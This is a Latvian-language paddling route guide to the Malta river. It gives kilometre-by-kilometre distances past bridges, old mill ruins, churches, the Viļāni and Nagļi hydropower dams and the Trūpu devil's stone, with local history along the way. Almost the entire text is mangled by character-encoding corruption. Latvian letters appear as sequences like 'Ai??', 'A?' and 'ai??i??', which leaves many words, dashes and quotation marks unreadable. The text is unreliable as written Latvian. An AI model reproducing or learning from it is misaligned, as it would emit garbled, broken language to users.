Malta | Dēkaiņi

Malta


Malta Print This Post

ai??zMalta-80 kmai???

Malta ir RAi??zeknes kreisA? krasta pieteka Dagdas, RAi??zeknes, RiebiAi??u un ViA?A?nu novados. Iztek no SalA?ja ezera. DaA?kA?rt par upes augA?tecAi??m uzskata Mostouku (Mostovuhu) (posms starp Diunokli un SalA?ju), Klismetku (posms starp Luknoju un Diunokli) un Tacu (posms no Luknoja lAi??dz Boraugas ezeram). Malta uzAi??em Ai??deAi??us no daudziem ezeriem Latgales augstienes centrA?lajA? daA?A? ar to kopplatAi??bu 18 kmA?. Pie augsta Ai??dens lAi??meAi??a MaltA? pa Kozupi pieplAi??st arAi?? Zosnas un RA?znas ezeru Ai??dens. Upes kritums ir neviendabAi??gs: augA?tecAi?? ap 2 m/km, regulAi??tajA? posmA? no Baldas ietekas lAi??dz Liskas ietekai – <0,5 m/km. LAi??dz 1966. g. Malta ietecAi??ja LubA?na ezerA?. Tagad Malta pa Maltas – RAi??zeknes kanA?lu novadAi??ta RAi??zeknes upAi??. Vecmaltas gultne (6 km) izmantota par A?deAi??as kanA?la posmu, kurA? saplAi??st Ai??deAi??i no NagA?u dAi??Ai??iem. Uz Z no Maltas ciema, aiz dzelzceA?a, upes gultne novirzAi??ta pa agrA?kajiem smilA?u karjeriem, bet vecgultne palikusi kreisajA? krastA? un vasarA?s stipri aizaug ar Ai??dens augiem. Maltas garums sasniedz 105 km, pirms gultnes regulAi??A?anas tas bija 115 km. Malta ir viena no retajA?m upAi??m, kas ietilpst LubA?na upju baseinA?.

A?denstAi??rismam visu sezonu izmantojama no LeimaniA?ku – Ai??peA?u tilta, kas atrodas 5 km pirms Maltas ciema, braucot no Dagdas puses. Rakstos minAi??ts, ka augsta Ai??dens lAi??meAi??a apstA?kA?os marA?rutu varot sA?kt arAi?? no SalA?ja ezera.

 

 

 

 

 

MAi??su marA?ruta apraksts sA?ksies no LeimaniA?ku – Ai??peA?u tilta. Ai??eit ir Ai??rti piebraukt ar transportu, tomAi??r nakA?Ai??oA?anai A?Ai?? vieta nav Ai??sti piemAi??rota, jo upes krasti ir samAi??rA? mitri un ir grAi??tAi??bas ar malku. Upes krasti pA?rsvarA? ir apauguA?i ar sAi??kiem krAi??miem, un pAi??c kvalitatAi??vA?kas malkas jA?iet lAi??dz tuvA?kajam meA?iAi??am. Upes platums A?eit ir apmAi??ram 10 m, straume nav liela ai??i?? kritums 0,2 m uz kilometru. Jau no Baldas upAi??tes ietekas Maltas gultne ir regulAi??ta. Tas ir jAi??tams un redzams arAi?? A?eit. Upes krasti sA?kuma posmA? pA?rsvarA? ir pA?rmitri, apauguA?i ar krAi??miem, grAi??sli, nA?trAi??m, dadA?iem un citiem mitrumu mAi??loA?iem augiem. VasarA? gultne aizaug ar Ai??denszA?lAi??m. LauksaimniecAi??bA? izmantojamA? zeme sA?kas vairA?kus metrus no upes krasta. KA? jau daudzviet LatvijA?, arAi?? A?eit, Maltas krastos, ir daudz neapkoptu zemju, kas pamazA?m aizaug. Pirmo orientieri mAi??su marA?rutA? sasniedzam pAi??c 2,9 km ai??i?? tA? ir augstsprieguma elektrolAi??nija. NA?koA?ais orientieris ir autoceA?a Malta – Kaunata tilts. No elektrolAi??nijas esam veikuA?i 1,8 km. Ai??eit jau ir manA?ma Maltas apbAi??ve, precAi??zA?k ai??i?? Rozentova, kas ir nesaraujami saistAi??ta ar Maltu.

Maltu lAi??dz 1936. gadam dAi??vAi??ja par Borovaju, savukA?rt Maltas pagastu lAi??dz 1925. gadam – Rozentovas pagasts. Rozentova bija lielA?kA? muiA?a tuvA?kajA? apkA?rtnAi??. 18. gs. sA?kumA? tA? piederAi??ja vA?cu muiA?niekam A. FelkerzA?mam, 18. gs. beigA?s ai??i?? poA?u muiA?niekam Ai??adurskim, vAi??lA?k – Bogomelecu dzimtai.

ApmAi??ram pAi??c 100 m pa upi uz leju no autoceA?a tilta mAi??s nonA?kam pie gA?jAi??juAi??tiltiAi??a. Ai??eit var piestA?t un doties apraudzAi??t 130 m attA?lo Rozentovas katoA?u baznAi??cu.

 

 

 

 

 

 

Rozentovas (Maltas) Sv. Krusta PagodinA?A?anas Romas katoA?u baznAi??ca ir koka celtne ar vienu torni. Dievnams celts laikA? no 1780. lAi??dz 1782. gadam par A. FelkerzA?ma lAi??dzekA?iem. TomAi??r drAi??z tas izrA?dAi??jA?s par mazu lielajai draudzei. 1842. gadA? baznAi??ca pagarinA?ta pirmoreiz, bet 1906. gadA? ar Rozentovas muiA?as Ai??paA?niekuAi??Bogomelecu atbalstu tA? pagarinA?ta vAi??lreiz. BaznAi??cA? atrodas glezna ai??zKristus pie krustaai???, trAi??s altA?ri, kA? arAi?? ir saglabA?juA?ies savdabAi??gi interjera priekA?meti – feretroni, maza izmAi??ra pA?rvietojami altA?rAi??A?i. Viens no tiem ir koka, tA? vienA? pusAi?? atveidots Sv. Juris, bet otrA? ai??i?? SvAi??tA? TrAi??svienAi??ba.

 

 

 

No katoA?u baznAi??cas dodoties pa ielu Z virzienA?, pAi??c 600 metriem nonA?kam pie Maltas (Rozentovas) VisusvAi??to pareizticAi??go baznAi??cas. Ai??TA? celta 1928. gadA? kA? neliela koka guA?bAi??ve pie pareizticAi??go kapsAi??tas. BaznAi??cas fasA?dAi??s iestrA?dA?ts stilizAi??ts saules motAi??vs, tai ir sapA?roti logu rA?mji un sAi??polveida kupoliAi??A?. ApskatAi??juA?i baznAi??cu, varam turpinA?t marA?rutu. No starta vietas esam veikuA?i 5,7 km.

 

 

 

 

No gA?jAi??ju tiltiAi??a apmAi??ram pAi??c 1 km esam nonA?kuA?i pie Maltas (Borovajas, Borovkas) vecticAi??bnieku kopienas lAi??gA?anu nama, kas ir vietAi??jas nozAi??mes arhitektAi??ras piemineklis. Dievnams atrodas upes kreisajA? krastA? un no upes ir labi apskatA?ms. TA? celtniecAi??ba sA?kta 1931. gadA?, un to cAi??lis bAi??vuzAi??Ai??mAi??js A. GrunceviA?s. Aiz vecticAi??bnieku dievnama, pAi??c 320 metriem, sasniedzam vAi??l vienu gA?jAi??ju tiltiAi??u. No A?Ai?? tiltiAi??a, piestA?jot kreisajA? krastA?, visAi??rtA?k ir nokA?Ai??t Maltas centrA?. Te var plA?not iepirkA?anos vietAi??jos veikalos, jo, izAi??emot ViA?A?nus, citur bAi??s jA?mAi??ro krietns gabals lAi??dz tuvA?kajam veikalam.

 

 

 

No gA?jAi??ju tiltiAi??a pAi??c 530 m sasniedzam A?osejas RAi??zekne ai??i?? Daugavpils tiltu.Ai??1836. gadA? caur tagadAi??jA?s Maltas teritoriju tika izbAi??vAi??ts PAi??terburgas – VarA?avas lielceA?A?, bet vAi??lA?k, 1861. gadA?, atklA?ta dzelzceA?a lAi??nija PAi??terburga ai??i?? VarA?ava ar dzelzceA?a staciju Antonopole. Virzoties no netA?lA?s Rozentovas muiA?as uz jaunuzbAi??vetA?s dzelzceA?a stacijas pusi, veidojA?s jauna apdzAi??vota vieta – Borovaja, kura, pateicoties izdevAi??gajam novietojumam A?etru ceA?u krustojumA? un dzelzceA?a malA?, drAi??z kA?uva par galveno apkA?rtnes tirdzniecAi??bas vietu. 1936. gadA? Borovajas ciems tika pA?rdAi??vAi??ts par Maltu, apdzAi??votajA? vietA? bija 139 mA?jas ar 715 iedzAi??votA?jiem un vairA?ki desmiti tirgotavu, kuras galvenokA?rt piederAi??ja ebrejiem. Tolaik Malta bija lielA?kais ciems RAi??zeknes apriAi??Ai??Ai??.

 

 

No A?osejas tilta pAi??c 2 km sasniedzam dzelzceA?a tiltu. No marA?ruta sA?kumaAi??esam veikuA?i 9,61 km.

Aiz dzelzceA?a tilta, pAi??c 300 m, esam nonA?kuA?i vietA?, kur Maltas upes gultne sadalA?s ai??i?? vecupe ir pa kreisi un plAi??st caur Gornicas ciemu, bet jaunA? gultne plAi??st taisni uz Z un apiet Gornicas ciemu. Mums jA?dodas taisni, jo A?eit ir spAi??cAi??gA?ka straume un gultne mazA?k aizaug ar Ai??densaugiem. JA?atzAi??mAi??, ja veco gultni speciA?li nemeklAi??, to var pat nepamanAi??t. VecajA? gultnAi?? straumes faktiski nav, un tA? ir stipri aizaugusi.

 

 

 

PAi??c 690 m aiz dzelzceA?a tilta labajA? pusAi?? Maltas jaunajA? gultnAi?? ietek VertukA?nes upe. DaA?os kartogrA?fiskajos materiA?los norA?dAi??ts, ka Malta savienota ar VertukA?ni un ka jaunA? Maltas gultne ir VertukA?ne, bet Malta ir vecA? gultne. Lai nu kA? bAi??tu, turpmA?kos 2,1 km Malta/VertukA?ne pA?rsvarA? plAi??st caur meA?u, lAi??dz atkal savienojas ar Maltas veco gultni. TA?lA?kA? upe, jau atkal viennozAi??mAi??gi, ir Malta. PAi??c 570 m aiz sateces vietas, uzreiz aiz attAi??rAi??A?anas iekA?rtA?m, no kreisA? krasta MaltA? ietek Mozgupe, bet vAi??l pAi??c 1,85 km no labA? krasta ai??i?? Prezma. Aiz Prezmas ietekas pAi??c 1,45 km A?Ai??Ai??rsojam augstsprieguma elektrolAi??niju, bet vAi??l pAi??c 710 m sasniedzam autoceA?aAi??Malta ai??i?? ViA?A?ni tiltu. No marA?ruta sA?kuma esam veikuA?i 17 km.

Aiz tilta upes kreisajA? krastA? ir Silmalas ciems. VAi??sturiski tas ir veidojies kA? vecticAi??bnieku ciems, ar raksturAi??go krievu apbAi??vi un arhitektAi??ru. KA?dreiz ciemA? bija neliels pA?rtikas veikals, kas pAi??dAi??jA? laikA? vairs nestrA?dA?.

Turpinot marA?rutu, pAi??c 7,6 km nonA?kam pie Zaharinas tilta. Ai??ajA? posmA?, pirmos kilometrus aiz Silmalas, no upes ir manA?mi skaisti prieA?u meA?i, lai gan paA?uAi??upi ieskauj krAi??mi un pA?avas, kas vietA?m ir mitras. ApdzAi??votAi??ba nav manA?ma lAi??dz pat Zaharinai. SavukA?rt no Zaharinas apdzAi??votAi??ba ir salAi??dzinoA?i blAi??va, jo te tuvumA? ir Kruku (KruAi??u) ciems. Pa ceA?u no tilta lAi??dz Krukiem (KruAi??iem) ir apmAi??ram 2,5 km.

 

 

 

 

PAi??c 3,65 km aiz Zaharinas tilta ir nA?koA?ais tilts. Ai??is ir autoceA?a Kruki ai??i?? RiebiAi??iAi??tilts jeb Hatku tilts. Hatki ir tiltam tuvA?kA? apdzAi??votA? vieta. ApmAi??ram 1,6 km pirms Hatku tilta MaltA? ietek kreisA? krasta pieteka ai??i?? Liska (18 km), kas ir otra garA?kA? Maltas pieteka. VAi??l garA?ka ir tikai Balda (24 km). No Hatku tilta pa ceA?u lAi??dz Kruku (KruAi??u) ciema centram ir apmAi??ram 1,5 km. No marA?ruta sA?kuma esam veikuA?i 28,25 km.

Kruku (KruAi??u) ciems ir veidojies padomju laikA? kA? kolhoza centrs. PaA?laik A?eit dzAi??vo vairA?k nekA? 400 iedzAi??votA?ju. Ai??eit ir lauku ciemam ierastA? infrastruktAi??ra ai??i?? veikali, skola, aptieka u.c.

 

 

DrAi??z aiz Hatku tilta beidzas Maltas regulAi??tais posms. TA?lA?k lAi??dz NagA?iem upe ir saglabA?jusi savu dabisko gultni. SA?kas Maltas skaistA?kais posms. DrAi??z, pAi??c 1,45 km, MaltA? ietek kreisA? krasta pieteka ai??i?? Ai??aloAi??a. Aiz Ai??aloAi??as ietekas vAi??l pAi??c 4 km ir nA?koA?A?s kreisA? krasta pietekas – Nalobnes (A?ornajas) – ieteka. Ai??ajA? posmA? Maltas abi krasti ir samAi??rA? blAi??vi apdzAi??voti, seviA?Ai??i labais krasts. Gar A?o krastu arAi?? vijas lauku ceA?A?, kas savieno Hatkus ar Maltas TrAi??piem. Aiz Nalobnes (A?ornajas) Malta kA?Ai??st aizvien platA?ka. PosmA? lAi??dz ViA?A?nu HES Ai??denskrA?tuvei upes gultnAi?? bieA?i ir sastopamiAi??lieli, skaisti laukakmeAi??i. ArAi?? pati gultne vijas pa izteiktu ieleju. Nu vairs krasti nav klA?ti ar sAi??kiem krAi??miem un alkA?Ai??iem, bet gan vareniem kokiem un ievA?m, kas pavasaros vareni zied un smarA?o.

 

 

2,3 km aiz Nalobnes (A?ornajas) ietekas Malta uzAi??em labA? krasta pieteku LeiA?upi. LeiA?upe (12 km) ir treA?A? garA?kA? labA? krasta pieteka. A?si pirms LeiA?upes ietekas A?Ai??Ai??rsojam vecu Ai??dens dzirnavu atraA?anA?s vietu. Par bijuA?ajA?m dzirnavA?m te liecina tikai mAi??ra atliekas upes labajA? krastA? un nelielasAi??krA?cAi??tes, kas A?ajA? Maltas posmA? nemaz nav tik bieA?i sastopamas.

 

 

 

 

No LeiA?upes ietekas pAi??c 810 m sasniedzam kA?rtAi??jo tiltu. Ai??oreiz tas ir autoceA?a Zabalotje ai??i?? Maltas TrAi??piAi??tilts jeb vienkA?rA?i ai??i?? Maltas TrAi??pu tilts. No marA?ruta sA?kuma esam veikuA?i 36,8 km.

 

 

 

 

 

Aiz Maltas TrAi??pu tilta, pAi??c 3,8 km, esam nokA?uvuA?i pie nA?koA?ajA?m Ai??dens dzirnavu drupA?m. Ai??eit par bijuA?ajA?m dzirnavA?m liecina trAi??s mAi??ra sienas abos upes krastos un upes vidAi??. ArAi?? A?eit ir nelielas krA?cAi??tes. Te ir saglabA?jies arAi?? apvedkanA?ls, lai gan vietu, kur kanA?ls atdalA?s no Maltas, ir grAi??ti saskatAi??t, jo tA? aizaug ar Ai??densaugiem. PAi??c 170 m kanA?ls atkal ietek MaltA?, un A?Ai?? ieteka ir labA?k redzama.

 

 

 

 

Aiz vecajA?m dzirnavA?m, pAi??c 2,9 km, nonA?kam UstroAi??os. ArAi?? UstroAi??os kA?dreiz ir bijuA?as Ai??densdzirnavas. PA?r dzirnavu aizsprostu bija tilts un ceA?A?, kas savienoja upes labajA? krastA? esoA?os UstroAi??us ar kreisajA? pusAi?? esoA?ajA?m sA?dA?A?m. ArAi?? A?eit ir saglabA?juA?A?s trAi??s A?Ai??elto akmeAi??u sienas un ir nelielas krA?cAi??tes.

 

 

 

 

 

No Nalobnes (A?ornajas) ietekas lAi??dz UstroAi??iem Malta ir robeA?upe starp RiebiAi??u, ViA?A?nu un RAi??zeknes novadiem, bet no UstroAi??iem tA? jau pilnAi??bA? plAi??st pa ViA?A?nu novadu. Aiz UstroAi??iem Maltas krasti kA?Ai??st zemA?ki, bieA?A?k ir manA?ma lauksaimnieciskA? darbAi??ba. Upes gultnAi?? ir sastopami ar Ai??densaugiem aizauguA?i nelieliAi??sAi??kA?i un paslAi??puA?ies laukakmeAi??i. DrAi??z upes labajam krastam pietuvojas ViA?A?nu ai??i?? TiskA?du autoceA?A?, kas paralAi??li upei iet lAi??dz pat ViA?A?niem. Aiz UstroAi??iem, pAi??c 970 m, A?Ai??Ai??rsojam augstsprieguma elektrolAi??niju. VAi??l pAi??c 5,1 km sasniedzam Maltas labA? krasta pietekas Tiskadas (Ciskodas) ieteku. Tiskada (Ciskoda) ir garA?kA? Maltas labA? krasta pieteka. TA?s garums sasniedz 14 km. VAi??l pAi??c 1 km esam nonA?kuA?i pie gA?jAi??ju tiltiAi??a apdzAi??votA? vietA? ar interesantu nosaukumu ai??i?? PodA?izovka. 2,1 km aizAi??PodA?izovkas no kreisA? krasta MaltA? ietek Notras upAi??te. No A?Ai??s vietas jau ir jAi??tama ViA?A?nu HES ietekme. Lai arAi?? Ai??denskrA?tuve vAi??l nav sA?kusies, tomAi??r upes gultne kA?Ai??st platA?ka un straume vA?jA?ka. A?denskrA?tuve sA?kas vAi??l pAi??c 1,4 km.

 

A?denskrA?tuves garums ir 550 m, bet platums vidAi??ji 115 m. TA? tika izveidotaAi??1994. gadA?, kad atjaunoja ViA?A?nu HES darbAi??bu, kas ir pirmA?, privA?tA? elektrostacija ne tikai LatvijA?, bet arAi?? BaltijA?. TA?s atjaunoA?ana notika uz 1950. gadA? celtA?s elektrostacijas pamatiem. Pie elektrostacijas aizsprosta no marA?ruta sA?kuma esam veikuA?i 54,8 km. ViA?A?ni ir novada centrs ar 3,5 tAi??kstoA?iem iedzAi??votA?ju. Uzreiz aiz aizsprosta, upes kreisajA? krastA?, ir apskatA?ma ViA?A?nu muiA?a. ViA?A?nu muiA?ai piederAi??ja zemes vairA?k nekA? 49000 ha platAi??bA?, un tA? bija viena no lielA?kajA?m Latgales muiA?A?m. 18. – 19. gs. mijA? ap muiA?u sA?ka veidoties ViA?A?nu miests. 19. gs. beigA?s celto muiA?as dzAi??vojamo Ai??ku ieskauj parks. ViA?A?nu muiA?as klAi??tAi??, kas celta no sarkaniem Ai??ieA?eA?iem, mAi??sdienA?s izvietojusies ViA?A?nu mAi??zikas un mA?kslas skola.

 

 

Aizsprostam laivas nA?ksies celt pA?ri. ViA?A?nu HES, tA? pat kA? citA?sAi??elektrostacijA?s, Ai??dens lAi??menis tiek cikliski regulAi??ts. BrAi??A?os, kad slAi??A?as ir aizvAi??rtas, Ai??dens lAi??menis upAi?? var bAi??t zems, bet brAi??A?os, kad slAi??A?as atver, Ai??dens lAi??menis ceA?as, un pieaug straumes A?trums. Ir gadAi??jumi, kad laivas vakarA? atstA?j upes krastA?, bet no rAi??ta lAi??dz upei ir vairA?ki metri. Aiz ViA?A?niem nakA?Ai??ojot, to laivotA?jiem vajadzAi??tu Ai??emt vAi??rA?, lai no rAi??ta nebAi??tu daA?A?di pA?rsteigumi!

 

 

 

 

DrAi??z aiz aizsprosta, upes kreisajA? krastA?, blakus muiA?as parkam, ir LakstAi??galuAi??sala ar estrA?di, kas ir iemAi??A?ota viA?A?nieA?u atpAi??tas vieta. PatiesAi??bA?, A?eit gan ir divas salas – lielA? un mazA?. Par LakstAi??galu salu sauc abas salas. LakstAi??galu sala attaisno savu nosaukumu ai??i?? maija ziedonAi?? lakstAi??galu treA?A?i A?eit skan nepA?rtraukti. TAi??ristiem LakstAi??galas salu vajadzAi??tu apbraukt pa labo pusi, jo A?eit ir augstA?ks Ai??dens lAi??menis, spAi??cAi??gA?ka straume. Augsta Ai??dens lAi??meAi??a apstA?kA?os A?eit veidojas krA?cAi??tes, kas piedod braucienam adrenalAi??na devu.

 

 

 

 

JA?Ai??em vAi??rA?, ka gultnAi?? ir daudz akmeAi??u, kas zema Ai??densAi??lAi??meAi??a apstA?kA?os bAi??s prasmAi??gi jA?apbrauc. Apbraucot salu no kreisA?s puses, mazo salu varAi??s apbraukt, bet lielo salu diezin vai, jo aiz estrA?des Ai??dens lAi??menis ir A?oti zems, un vasarA?s tur mAi??dz bAi??t pavisam maz Ai??dens.

 

 

 

 

 

PAi??c 570 m aiz aizsprosta esam nonA?kuA?i pie LakstAi??galu salas gA?jAi??ju tiltiAi??a. Ai??eit var piestA?tAi??un doties apskatAi??t estrA?di vai doties uz pilsAi??tu iepirkties. No A?Ai??s vietas ir tuvA?kais ceA?A?Ai??lAi??dz ViA?A?nu lielA?kajam veikalam ai??i?? apmAi??ram 0,5 km. No tiltiAi??a izejam uz RaiAi??a ielu un, ejot pa to, gar stadionu, nonA?kam lAi??dz krustojumam ar BrAi??vAi??bas ielu. Ai??eit uz ielas stAi??ra arAi?? ir veikals.

 

 

 

 

PAi??c 1 km no LakstAi??galu salas tiltiAi??a esam nonA?kuA?i pie tA? sauktA? A?grenieku tilta.Ai??Tilts Saules ielas galA? tika uzbAi??vAi??ts brAi??vvalsts laikA?, jo tA? bAi??tu iespAi??jams iztaisnot ceA?u lAi??dz VarakA?A?niem. PaA?laik A?eit gan ir saglabA?jies tikai gA?jAi??ju tiltiAi??A?, un no vecA? tilta ir saglabA?juA?ies tikai apdrupuA?i balsti. Ai??eit Maltas kreisajA? krastA?, tA? saucamajA?s baznAi??ckunga pA?avA?s, tika uzAi??emta kinofilmas ai??zCilvAi??ka bAi??rnsai??? epizode, kad BoAi??uks uz celAi??A?iem skaita lAi??gA?anu. Krastos tika izcirsti kA?rkli, lai pavAi??rtos labs skats uz baznAi??cu. LaulA?A?anas skats arAi?? tika uzAi??emts ViA?A?nos. Ai??eit var piestA?t un iet aplAi??kot pilsAi??tas centru. InteresantA?kais objekts ir Sv. ErceAi??A?eA?a MiAi??eA?a katoA?u baznAi??ca un klostera komplekss. Klosteris bAi??vAi??ts uz ViA?A?nu muiA?as zemes 1753. – 1772. g. pAi??c bernardieA?u tradicionA?lo klosteru parauga ar iekA?Ai??jo pagalmu. TA? bAi??vdarbus finansAi??ja muiA?nieks Mihails Riks. DivtorAi??u dievnama fasA?de veidota rokoko stilA?. 1823. g. Krievijas valdAi??ba klosteri slAi??dza, tA? darbAi??bu atjaunoja tikai 1924. g. BaznAi??ca un klostera komplekss stipri postAi??ts 2. pasaules kara laikA?, kad sagrA?va baznAi??cas torAi??us un uzspridzinA?ja klostera Ai??kas. PAi??c kara baznAi??cu un klostera Ai??kas atjaunoja. BaznAi??cA? saglabA?juA?ies vairA?ki nozAi??mAi??gi glezniecAi??bas, tAi??lniecAi??bas un lietiA?Ai??A?s mA?kslas pieminekA?i.

AtgrieA?amies pie upes un turpinA?m ceA?u. No upes paveras skaista ainava uzAi??ViA?A?nu baznAi??cu un tA?s torAi??iem. PAi??c 1,6 km esam nonA?kuA?i pie dzelzceA?a Krustpils ai??i?? RAi??zekne tilta. Aiz tilta, pAi??c 900 m, upes labajA? krastA? redzamas ViA?A?nu slimnAi??cas Ai??kas, bet vAi??l pAi??c 310 m esam sasnieguA?i JAi??kabpils ai??i?? RAi??zekne autoceA?a tiltu. No marA?ruta sA?kuma esam veikuA?i 59,2 km.

 

 

 

 

 

Ai??eit upes labajA? krastA? pie viesu nama ai??zLA?A?u lejaai???Ai??varAi??tu piestA?t un iet apraudzAi??t TrAi??pu Velnakmeni. Uz Velnakmeni ir jA?dodas pA?ri tiltam JAi??kabpils virzienA? un pirmajA? ceA?A? uzreiz aiz tilta jA?nogrieA?as pa labi. PAi??c 200 m nonA?kam pie ceA?a rA?dAi??tA?ja ai??zTrAi??pu Velna akmens 0,35 kmai???. Esam nonA?kuA?i Kaupra kalnA?. DiemA?Ai??l, bAi??vAi??jot A?o ceA?u, Kaupra kalns A?ajA? vietA? tika norakts. TomAi??r, nogrieA?oties no lielceA?a un ejot pa meA?a ceA?u ZR virzienA? uz TrAi??pu Velnakmeni, labajA? pusAi?? Kaupra kalna aprises ir jAi??tamas.

 

 

 

 

Turpinot iet pa meA?a ceA?u, pAi??c 300 m labajA? pusAi??, nelielA? ieplakA?, atrodas TrAi??pu Velnakmens. KA? orientieris arAi?? noder pirms tam kreisajA? pusAi?? redzamA? pA?rpurvojusies vieta, aiz kuras jA?sA?k lAi??koties pa labi, lai akmenim nepaietu garA?m, jo citas norA?des vairs nav. TrAi??pu Velnakmens nosaukumu esot ieguvis no tA?, ka Velns te kaltAi??jis savu naudu. Lielais akmens saA?Ai??elts trAi??s daA?A?s.Ai??Tam izskaidrojumu dod teikas. Velns esot A?A?vAi??jis savu zeltu, Dievam tas A?oti nepaticis, tA?pAi??c tas ar zibeni velnu nospAi??ris. No zibens spAi??riena akmens pA?rplAi??sis divA?s daA?A?s, bet Velna zelts nogrimis zem akmens. Viena no akmens pusAi??m pagA?juA?A? gadsimta pirmajA? pusAi?? saspridzinA?ta divA?s daA?A?s ai??i?? meklAi??jot to paA?u zeltu. LielA?kA?s daA?as (garums 4 m, platums 3 m, augstums 1,9 m) virspusAi?? redzams neregulA?rs iedobums, tas liecina par A?eit bijuA?o kulta vietu. ApskatAi??juA?i TrAi??pu Velnakmeni, dodamies atpakaA? un turpinA?m marA?rutu.

 

PAi??c 2,55 km esam nonA?kuA?i pie OrnicA?nu tilta. Zem tilta vajadzAi??tu turAi??ties galvenajA? straumAi?? – pa labi, tuvA?k labajam krastam. Ai??is ir pAi??dAi??jais tilts ceA?A? lAi??dz NagA?iem, un tilta abos galos ir aizsprosta apvedkanA?li. Aiz tilta, upes gultnAi??, ir daudz laukakmeAi??u. No marA?ruta sA?kuma esam veikuA?i 62,8 km.

 

 

 

 

 

Ai??eit jau upes platums ir pietiekoA?s un koku sanesumi un sakritumi vairs neveidojas. PAi??c 2,6 km upAi?? ir brasls, un kreisajam krastam pietuvojas lauku ceA?A?. Aiz brasla, pAi??c apmAi??ram 200 m, var piestA?t kreisajA? krastA? un iet aplAi??kot piemiAi??as zAi??miAi??NacionA?lajiem partizA?niem. PiemiAi??as zAi??me ir uzstA?dAi??ta 2007. gada augustA?, ceA?a malA?, zem liela ozola, pie bijuA?ajA?m VinA?u mA?jA?m. Ai??eit pAi??c OtrA? pasaules kara atradA?s RAi??zeknes apriAi??Ai??a nacionA?lo partizA?nu pulka A?tA?ba mAi??tnes vieta.

 

 

 

 

 

 

1 km no brasla upes labajam krastam pietuvojas lauku ceA?A? un 0,75 km iet paralAi??li upei, lAi??dz Malta strauji pagrieA?as uz R. LabajA? krastA? ir SkujaunAi??ku ciems,Ai?? bet kreisajA? ai??i?? Broku. PAi??c 1,2 km no upes pagrieziena esam nonA?kuA?i pie bijuA?ajA?mAi??Medinsku dzirnavA?m. Medinsku dzirnavas ir pAi??dAi??jA?s dzirnavas mAi??su marA?rutA?. Pirms dzirnavA?m Malta kA?Ai??st platA?ka, un tA?s gultnAi?? un krastos ir saglabA?juA?A?s A?etrasu mAi??ra sienu atliekas. Aiz dzirnavA?m ir izveidojusies plata, mierAi??ga, samAi??rA? dziA?a vieta. No marA?ruta sA?kuma esam veikuA?i 68,4 km.

 

 

 

TurpmA?kos 4 km aiz bijuA?ajA?m Medinsku dzirnavA?m Maltas krastos pA?rsvarA? ir tAi??rumi un ganAi??bas. Gar abiem krastiem paralAi??li upei tuvA?k vai tA?lA?k vijas lauku ceA?i. PAi??c minAi??tajiem 4 km esam sasnieguA?i ai??zLaktuai??? mA?jas. TA?lA?k upes plAi??dumA? pamazA?m ir jAi??tama NagA?u HES ietekme. Ai??eit Malta kA?Ai??st platA?ka, straume lAi??nA?ka, krastos parA?dA?s mitras pA?avas, un kreisajA? krastA? ir manA?ms aizsargdambis. PAi??c 3 kmAi??esam sasnieguA?i NagA?u HES Ai??denskrA?tuvi. Nu jau aizsargdambji ir Ai??denskrA?tuves abos krastos.

 

 

 

 

A?denskrA?tuves platums platA?kajA? vietA? sasniedz 190 m, vidAi??jais platums ir ap 170 m. PAi??c 2 km Ai??denskrA?tuve sA?k saA?aurinA?ties – tuvojamies HES aizsprostam unAi??pAi??c 530 m esam to sasnieguA?i. Ai??eit ir Ai??rta vieta, lai beigtu ceA?ojumu. No marA?ruta sA?kuma esam veikuA?i 73,4 km.

NagA?u HES atrodas NagA?u ciema centrA?. Ciems ir izvietojies upes abA?s pusAi??s gar ceA?u. KreisajA? pusAi?? atrodas ciema senA?kA? Ai??ka – NagA?u katoA?u baznAi??ca. Ja jums ir nepiecieA?ams veikals, tad tas ir jA?meklAi?? tajA? ciemata daA?A?, kas atrodas labajA? pusAi??.

 

 

 

Nenoliedzami NagA?u ievAi??rojamA?kA? celtne ir NagA?u katoA?u baznAi??ca. TagadAi??jA?Ai??akmens mAi??ra Sv. JA?Ai??a KristAi??tA?ja katoA?u draudzes baznAi??ca ir celta 1862. gadA?. To cAi??la toreizAi??jais muiA?kungs NA?bels, kas esot bijis luterA?nis. Jau 18. gs. NagA?os ir bijusi neliela koka baznAi??ciAi??a, kuru apkalpojuA?i ViA?A?nu bernardieA?i. BaznAi??cA? atrodas mA?kslas piemineklis – 18. gs. darinA?tA? SvAi??tA? LAi??kasa skulptAi??ra.

LAi??dz 1966. gadam Malta ietecAi??ja LubA?na ezerA?, bet, veidojot LubA?na hidrotehnisko sistAi??mu, Malta pa Maltas – RAi??zeknes kanA?lu novadAi??ta uz RAi??zeknes upi. MAi??s atrodamies kanA?la augA?galA? pie slAi??A?A?m, kas Maltas ielejA? veido NagA?u Ai??denskrA?tuvi. Vecmalta, kas aizplAi??st pa kreisi, 6 km garumA? veido A?deAi??as kanA?la posmu. KreisajA? pusAi?? redzama 2001. gadA? ekspluatA?cijA? nodotA? NagA?u HES. Ja mAi??s esam nolAi??muA?i turpinA?t marA?rutu, tad faktiski mAi??s to turpinA?sim pa Maltas – RAi??zeknes kanA?lu.

 

PA?r aizsprostu laivas nA?ksies pA?rnest. KanA?ls no abA?m pusAi??m ir ierobeA?ots arAi??dambjiem, un sA?kumA? to no abiem krastiem klA?j meA?s. PAi??c 3,2 km kanA?la labajA? pusAi?? sA?kas OrenAi??A?u zivju dAi??Ai??i. Ir interesanti piestA?t un palAi??koties uz A?iem dAi??Ai??iem no dambja. Ne velti padomju laikA? NagA?u zivsaimniecAi??ba bija viena no lielA?kajA?m bijuA?ajA? PSRS.

TurpinA?m marA?rutu un pAi??c 2,8 km sasniedzam kanA?la ieteku RAi??zeknes upAi??. No marA?ruta sA?kuma esam veikuA?i 79,4 km. Ai??eit nav Ai??rta vieta lai beigtu ceA?ojumu, tA?dAi??A? ir ieteikums marA?rutu turpinA?t vAi??l apmAi??ram 1,2 km, kad RAi??zeknes labajam krastam cieA?i pietuvojas labi izbraucams lauku ceA?A?. Var arAi?? turpinA?t marA?rutu lAi??dz A?deAi??as tiltam, kas atrodas 5 km aiz kanA?la ietekas RAi??zeknAi??.

 

 

